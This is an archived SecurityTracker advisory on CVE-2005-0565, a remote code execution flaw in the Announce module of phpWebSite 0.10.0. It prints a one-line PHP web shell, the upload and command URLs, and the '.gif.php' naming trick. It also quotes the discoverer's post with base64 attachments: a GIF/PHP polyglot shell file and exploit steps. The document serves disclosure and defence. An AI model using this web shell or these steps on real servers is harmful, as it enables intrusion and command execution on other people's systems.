phpWebSite Announce Module Image Files Let Remote Users Execute Arbitrary PHP Code
|
SecurityTracker Alert ID: 1013298 |
SecurityTracker URL: http://securitytracker.com/id/1013298
|
CVE Reference:
CVE-2005-0565
(Links to External Site)
|
Updated: Feb 28 2005
|
Original Entry Date: Feb 25 2005
|
Impact:
Execution of arbitrary code via network, User access via network
|
Exploit Included: Yes
|
Version(s): 0.10.0 and prior versions
|
Description:
A vulnerability was reported in phpWebSite in the Announce module. A remote user with privileges to upload image files can execute arbitrary commands on the target system.
A remote user can create a specially crafted file that appears to be formatted as a GIF file but actually contains the following type of PHP code:
<?passthru($_GET[nst]);?>
If the remote user has privileges to submit announcements, the remote user can invoke the following type of URL and upload the specially crafted file as the Image file with a name of the form: "[anyname].gif.php":
http://[target]/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3
Then, the remote user can load the following URL to execute commands on the target system:
http://[target]/images/announce/[anyname].gif.php?nst=ls -la
Arbitrary PHP code and operating system commands can be executed with the privileges of the target web services.
Network security team discovered this vulnerability.
tjomka disclosed this vulnerability.
|
Impact:
A remote user can execute arbitrary PHP code and operating system commands with the privileges of the target web services.
|
Solution:
No solution was available at the time of this entry.
|
Vendor URL: phpwebsite.appstate.edu/ (Links to External Site)
|
Cause:
Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
|
Message History:
None.
|
Source Message Contents
|
Subject: phpWebSite-0.10.0_exploit
|
------------C81D4230180A6D
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
phpWebSite-0.10.0_exploit
------------C81D4230180A6D
Content-Type: application/octet-stream; name="nst.gif.php"
Content-transfer-encoding: base64
Content-Disposition: attachment; filename="nst.gif.php"
R0lGODlhMgAyAPcAAE1NTZubm1FRUREREYMMDDIQEFtbWw0KDQoNCsUNCgl8BQXU1NTNzc2E
hIRVVVUDAwOpqqnKyso8cHJlPsJPDQoNCjw/cGFzc3RocnUoJF9HRVRbbnN0XSk7Pz622ABX
VsAo7FHJkIyEDvDwD4a00QEOWeFfJuBEPVPhDQr+reMR+uymZjlbWwNYmgUBAQA7
------------C81D4230180A6D
Content-Type: text/plain; name="phpWebSite-0.10.0.EN.txt"
Content-transfer-encoding: base64
Content-Disposition: attachment; filename="phpWebSite-0.10.0.EN.txt"
b29vby4uLm9vb28ub29vb29vb284Lm9vb29vb29vb29vIA0KLjg4ODhvLi44OC44ODguLi4u
Li4uLjg4Li44ODguLjg4IA0KLjg4Ljg4OG84OC4uODg4b29vb29vLi4uLi44ODggICAgIA0K
Ljg4Li4uODg4OC4uLi4uLi4uLjg4OC4uLi44ODggICAgIA0Kbzg4by4uLi44OC5vODhvb29v
ODg4Li4uLm84ODhvICAgIA0KKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCioq
KiogTmV0d29yayBzZWN1cml0eSB0ZWFtICoqKioqDQoqKioqKioqKiogbnN0LmUtbmV4LmNv
bSAqKioqKioqKg0KKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioNCiogVGl0bGU6
IHBocFdlYlNpdGUgPD0gdjAuMTAuMA0KKiBCdWcgZm91bmQgYnk6IG5zdA0KKiBEYXRlOiAy
NC4wMi4yMDA1DQoqKioqKioqKioqKioqKioqKioqKioqKioqKioqKioqKg0KDQpXZWI6IHBo
cHdlYnNpdGUuYXBwc3RhdGUuZWR1DQoNCmh0dHA6Ly90YXJnZXQvaW5kZXgucGhwP21vZHVs
ZT1hbm5vdW5jZSZBTk5fdXNlcl9vcD1zdWJtaXRfYW5ub3VuY2VtZW50Jk1NTl9wb3NpdGlv
bj0zOjMNCg0KMS4gRmlsbCBhbGwgaW5wdXRzDQoyLiBpbiBJbWFnZTogc2VsZWN0IG5zdC5n
aWYucGhwDQoNCnByZXNzIFNhdmUuDQoNCkdvIGhlcmUgaHR0cDovL3RhcmdldC9pbWFnZXMv
YW5ub3VuY2UvbnN0LmdpZi5waHA/bnN0PWxzIC1sYQ==
------------C81D4230180A6D--
|
|